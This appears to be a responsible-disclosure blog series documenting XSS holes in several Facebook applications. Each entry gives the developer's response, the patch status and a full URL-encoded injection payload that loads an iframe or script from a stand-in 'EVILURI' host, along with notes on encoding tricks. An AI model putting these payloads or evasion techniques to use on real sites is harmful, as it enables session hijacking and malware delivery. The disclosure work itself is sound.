FAXX Hack: Lucky Strike Lanes

Facebook Verified Application

Current Monthly Active Users: 83,243

Current Rank on Application Leaderboard: 539

Application Developer: Large Animal Games

Responsiveness: LAG did not send any messages, but did patch the hole within a day or two. Actually, LAG was very responsive and moved swiftly to fix the holes, replying within minutes and posting a fix within hours. But for some reason, Gmail flagged the messages as spam and thus I didn’t notice them. My apologies to LAG, they did great work and I appreciate it!

Vulnerability Status: Patched

Capable of Clickjacking Install: Yes

Example URI: http://apps.facebook.com/luckystrikelanes/invite.php?tp_code=%22%2F%3E%3Cfb%3Aiframe+src%3D%22EVILURI%22%3E

Facebook Instapaper Twitter Digg FriendFeed Delicious Google Bookmarks Yahoo Bookmarks Share/Bookmark

FAXX Hack: Bumper Stars

Facebook Verified Application

Current Monthly Active Users: 55,431

Current Rank on Application Leaderboard: 659

Application Developer: Large Animal Games

Responsiveness: LAG did not send any messages, but did patch the hole within a day or two. Actually, LAG was very responsive and moved swiftly to fix the holes, replying within minutes and posting a fix within hours. But for some reason, Gmail flagged the messages as spam and thus I didn’t notice them. My apologies to LAG, they did great work and I appreciate it!

Vulnerability Status: Patched

Capable of Clickjacking Install: Yes

Example URI: http://apps.facebook.com/bumperstars/invite.php?tp_code=%22%2F%3E%3Cfb%3Aiframe+src%3D%22EVILURI%22%3E

Notes: You’ll notice the example URI only inserts an iframe, rather than attempting the sort of double-injection of previous examples. Bumper Stars, and two other Large Animal Games applications that will be posted soon, use Facebook’s server whitelist feature for API requests. This means that trying to use injected JavaScript to make API calls will fail, as they originate from the user’s computer and not LAG’s servers. One could still have used the XSS hole to launch a malware attack, but using the whitelist prevents stealing profile information or launching a viral attack via notifications and feed stories.

Bumper Stars was the first application I’ve encountered that made use of the server whitelist feature, and I commend LAG for that step. But while the feature can prevent many of the attacks I’ve outlined, it is not practical for every application. Many other developers make use of the JavaScript API for legitimate calls, and these would fail if the developer enabled a server whitelist.

Facebook Instapaper Twitter Digg FriendFeed Delicious Google Bookmarks Yahoo Bookmarks Share/Bookmark

FAXX Hack: kaChing

Facebook Verified Application

Current Monthly Active Users: 28,778

Current Rank on Application Leaderboard: 963

Application Developer: kaChing Group, Inc.

Responsiveness: I received an e-mail from kaChing saying the patch was fixed about six hours after notifying them.

Vulnerability Status: Patched

Capable of Clickjacking Install: Uncertain

Example URI: http://apps.facebook.com/kaching/portfolio/trade?symbol=%3Cfb%3Aiframe+src%3D%22http%3A%2F%2Fwww.kaching.com%2F%26%23×66%3B%26%23×62%3B%2F%26%23×70%3B%26%23×6F%3B%26%23×72%3B%26%23×74%3B%26%23×66%3B%26%23×6F%3B%26%23×6C%3B%26%23×69%3B%26%23×6F%3B%2F%26%23×74%3B%26%23×72%3B%26%23×61%3B%26%23×64%3B%26%23×65%3B%3F%26%23×73%3B%26%23×79%3B%26%23×6D%3B%26%23×62%3B%26%23×6F%3B%26%23×6C%3B%3D%253Ciframe%2Bsrc%253D%2522http%253A%252F%252Ffbl.li%252Fr%252F%2522%253E%22%3E

Notes: This hole was very straightforward, but fully exploiting it required one more trick. Since the injected parameter was a stock symbol, the resulting page would automatically capitalize the input when displaying an error message. That meant that the injected URI became uppercase when it needed to be lowercase. To combat that issue, I converted the text parts of the URI to hex encodings, then had to encode those values for a URI. All these steps resulted in the rather lengthy URI above, which did preserve capitalization.

P.S. Those should be lowercase x’s in the example URI.

Facebook Instapaper Twitter Digg FriendFeed Delicious Google Bookmarks Yahoo Bookmarks Share/Bookmark

FAXX Hack: Birthday Cards

Current Monthly Active Users: 9,067,238

Current Rank on Application Leaderboard: 18

Application Developer: RockYou

Responsiveness: Once again, RockYou never sent a message but did patch the hole.

Vulnerability Status: Patched

Capable of Clickjacking Install: No

Example URI: http://apps.facebook.com/rybirthday/zoo/shop.php?category=%22%2F%3E%3Cfb%3Aiframe+src%3D%22http://fb.rockyou.com/facebook_apps/rybirthdays/zoo/shop.php?category=%2522%252F%253E%253Ciframe%2Bsrc%253D%2522http%253A%252F%252FEVILURI%252F%2522%253E%22%3E

Facebook Instapaper Twitter Digg FriendFeed Delicious Google Bookmarks Yahoo Bookmarks Share/Bookmark

FAXX Hack: Bumper Sticker

Double hacks tomorrow to make up for Monday’s break.

Facebook Verified Application

Current Monthly Active Users: 5,422,286

Current Rank on Application Leaderboard: 29

Application Developer: LinkedIn

Responsiveness: I sent this hole to Facebook on Sep. 1, then followed up with an e-mail to LinkedIn over the weekend.

Vulnerability Status: Unpatched

Capable of Clickjacking Install: No

Example URI: After further consideration, I’ve changed my mind about the whole 24-hour thing. I’ll post details once the hole is patched.

Facebook Instapaper Twitter Digg FriendFeed Delicious Google Bookmarks Yahoo Bookmarks Share/Bookmark

Quick Update on FAXX Hacks

I did not post a FAXX hack on Monday for two reasons. First, I had forgotten to factor in the long weekend (Monday is Labor Day in the US) when notifying developers, hence posting would not have allowed an actual business day to pass before releasing details. Second, I spent most all of Saturday and again Monday in bed. I haven’t been terribly sick, but I’ve been dealing with tiredness and weakness.

None of this means I’ve hit a point where I lack for material. To make up for Monday’s omission, I will be posting two hacks one day this week. I may take another break on Tuesday to ensure developers have time to patch holes, but if that happens, I’ll simply post two hacks on a second day as well. The “month of Facebook bugs” is far from over.

Facebook Instapaper Twitter Digg FriendFeed Delicious Google Bookmarks Yahoo Bookmarks Share/Bookmark

FAXX Hack: RockYou Live

Facebook Verified Application

Current Monthly Active Users: 9,767,698

Current Rank on Application Leaderboard: 17

Application Developer: RockYou!

Responsiveness: After announcing this series, a Facebook security contact got in touch and requested more information. I complied, and apparently RockYou! issued a patch after receiving word from Facebook, as I’ve not heard from them but can no longer replicate the issue.

Vulnerability Status: Patched

Capable of Clickjacking Install: No

Example URI: http://apps.facebook.com/superwall/stickers_mainpage.php?type=cards&_ryfbe=fb-wall-header-stickers&msg=%22%2F%253E%253Cfb%253Aiframe%2Bsrc%253D%2522%22%3E%3Cfb%3Aiframe+src%3D%22http%3A%2F%2Ffb.rockyou.com%2Ffacebook_apps%2Frywall%2Fstickers_mainpage.php%3Ftype%3Dcards%26_ryfbe%3Dfb-wall-header-stickers%26msg%3D%2522%2522%253E%253Cscript%2Bsrc%253D%2522http%253A%252F%252FEVILURI%2522%253E%253C%252Fscript%253E

Notes: When I first figured out how to take advantage of XSS holes in FBML applications, I tried inserting a script element, as shown here. This worked with RockYou Live, but later applications included scripts prior to the insertion point. When taken out of the context of apps.facebook.com, these scripts would generate errors, and the inserted script would fail to execute. I then resorted to inserting another iframe which loaded a special HTML file that included the necessary script payload. Previous FAXX examples use this more reliable trick.

By the way, RockYou Live was also among the worst performers in my privacy policy survey a few weeks back.

Facebook Instapaper Twitter Digg FriendFeed Delicious Google Bookmarks Yahoo Bookmarks Share/Bookmark

FAXX Hack: Farm Town

Current Monthly Active Users: 18,638,429

Current Rank on Application Leaderboard: 7

Application Developer: Slashkey

Responsiveness: Slashkey reported that they went through their codebase and encoded all URI parameters after receiving word of the problem.

Vulnerability Status: Patched

Capable of Clickjacking Install: Yes

Example URI: http://apps.facebook.com/farmtown/select_friends/?type=%22%2F%3E%3Cfb%3Aiframe+src%3D%22http%253A%252F%252Fl1.slashkey.com%252Ffacebook%252Ffarm%252Fselect_friends%252F%253Ftype%253D%252522%25252F%25253E%25253Ciframe%252Bsrc%25253D%252522http%25253A%25252F%25252FEVILURI%25252F%252522%25253E%2526select%253Dfarm%22%2F%3E&select=farm

Facebook Instapaper Twitter Digg FriendFeed Delicious Google Bookmarks Yahoo Bookmarks Share/Bookmark

1 9 10 11 12 13 16